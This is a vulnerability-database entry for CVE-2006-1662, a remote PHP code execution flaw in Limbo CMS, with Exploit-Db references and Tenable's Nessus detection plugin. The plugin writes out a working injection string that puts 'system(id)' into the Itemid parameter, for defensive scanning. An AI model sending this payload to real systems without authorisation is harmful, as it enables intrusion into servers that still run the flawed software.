Vulnerabilities > CVE-2006-1662 - Unspecified vulnerability in Limbo CMS 1.0.4.1/1.0.4.2

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
limbo-cms
nessus
exploit available

Summary

The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.

Vulnerable Configurations

Part Description Count
Application
Limbo_Cms
2

Exploit-Db

  • description: Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit. CVE-2006-1662. Webapps exploit for php platform
    id: EDB-ID:1541
    last seen: 2016-01-31
    modified: 2006-03-01
    published: 2006-03-01
    reporter: str0ke
    source: https://www.exploit-db.com/download/1541/
    title: Limbo CMS <= 1.0.4.2 ItemID Remote Code Execution Exploit
  • description: Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit (meta). CVE-2006-1662. Webapps exploit for php platform
    id: EDB-ID:1563
    last seen: 2016-01-31
    modified: 2006-03-07
    published: 2006-03-07
    reporter: sirh0t
    source: https://www.exploit-db.com/download/1563/
    title: Limbo CMS <= 1.0.4.2 ItemID Remote Code Execution Exploit meta

Nessus

NASL family: CGI abuses
NASL id: LIMBO_ITEMID_CMD_EXEC.NASL
description: The remote host is running Limbo CMS, a content-management system written in PHP. The installed version of Limbo fails to sanitize input to the 'Itemid' parameter before using it as part of a search string in an 'eval()' statement in the 'classes/adodbt/read_table.php' script.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 20994
published: 2006-03-03
reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/20994
title: Limbo CMS index.php Itemid Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration branch: when `description` is set the plugin only declares its
# metadata (identifiers, report text, scoring, scheduling requirements) and
# then exits. Every call in this block is a script_* declaration; the probe
# itself lives after this block.
if (description) {
  script_id(20994);
  script_version("1.14");

  # Cross-references this check reports against: the CVE and Bugtraq ids.
  script_cve_id("CVE-2006-1662");
  script_bugtraq_id(16902);

  script_name(english:"Limbo CMS index.php Itemid Parameter Arbitrary Command Execution");
  script_summary(english:"Injects arbitrary PHP code via Itemid parameter in Limbo CMS");
 
 # Report text shown to the analyst. The description attribute states the
 # root cause: unsanitized 'Itemid' input reaches an eval() in
 # classes/adodbt/read_table.php, reachable without authentication and
 # independent of register_globals / magic_quotes_gpc.
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
an arbitrary code execution vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Limbo CMS, a content-management system
written in PHP. 

The installed version of Limbo fails to sanitize input to the 'Itemid'
parameter before using it as part of a search string in an 'eval()'
statement in the 'classes/adodbt/read_table.php' script.  Regardless
of PHP's 'register_globals' and 'magic_quotes_gpc' settings, an
unauthenticated attacker can leverage this issue to execute arbitrary
PHP code on the remote host subject to the privileges of the web
server user id." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/426428/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/429946/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8681f194" );
 script_set_attribute(attribute:"solution", value:
"Apply the Limbo security patch update from 2006-03-09." );
 # CVSS v2 base vector: network reachable, low complexity, no authentication,
 # partial impact on confidentiality, integrity and availability.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 # CVSS v2 temporal vector: E:F (functional exploit exists), RL:U (remediation
 # unavailable), RC:C (report confirmed).
 # NOTE(review): RL:U looks inconsistent with the "solution" attribute above,
 # which names a security patch dated 2006-03-09 - confirm which is current.
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/03/03");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/28");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();


  # ACT_ATTACK marks this as an active check rather than a banner/version
  # comparison: the probe later in this file asks a vulnerable target to run
  # the 'id' command, so a positive finding means code actually executed on
  # the scanned host.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  # Scheduling and gating: declared dependency on http_version.nasl, excluded
  # when the "Settings/disable_cgi_scanning" key is set, and requires a web
  # port plus the "www/PHP" key.
  # NOTE(review): presumably these keys are populated by earlier plugins in
  # the scanner knowledge base - not visible from this file.
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  # Leave now so the detection logic below never runs in registration mode.
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


# Choose the HTTP port to test (80 when nothing else is selected) and give up
# early if can_host_php() reports that the server cannot serve PHP.
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Extra install locations to try. "/limbo" is only added when thorough tests
# are enabled; otherwise no extra directory is passed.
extra_dirs = NULL;
if (thorough_tests) extra_dirs = make_list ("/limbo");

# Probe request for index.php with option=frontpage and a crafted Itemid.
# The current unixtime() is appended, so each request string is unique.
# For defenders: this appears in web server logs as a non-numeric Itemid on
# index.php, which is a reasonable pattern to alert on or block.
# NOTE(review): assumes legitimate Itemid values are numeric - confirm.
probe_request = string("/index.php?option=frontpage&Itemid=2|system(id)|", unixtime());

# Evidence that the command ran: response text shaped like `id` output.
id_output_pattern = "uid=[0-9]+.*gid=[0-9]+.*";

# Hand the probe to the shared remote-code-execution check helper, which is
# defined in an include and not shown in this file.
http_check_remote_code(
  port:port,
  extra_dirs:extra_dirs,
  command:"id",
  check_request:probe_request,
  check_result:id_output_pattern
);